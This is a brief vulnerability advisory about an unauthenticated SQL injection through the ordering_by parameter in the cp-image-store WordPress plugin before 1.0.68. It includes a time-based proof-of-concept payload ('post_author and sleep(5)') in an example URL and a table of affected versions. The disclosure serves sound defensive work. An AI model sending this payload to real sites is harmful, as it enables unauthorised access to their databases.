The plugin does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack
On a page where the [codepeople-image-store] is embed, append the following payload ordering_by=post_author+and+sleep(5) e.g: https://example.com/?cpis_image=test&ordering;_by=post_author+and+sleep(5)
CPE | Name | Operator | Version |
---|---|---|---|
cp-image-store | lt | 1.0.68 |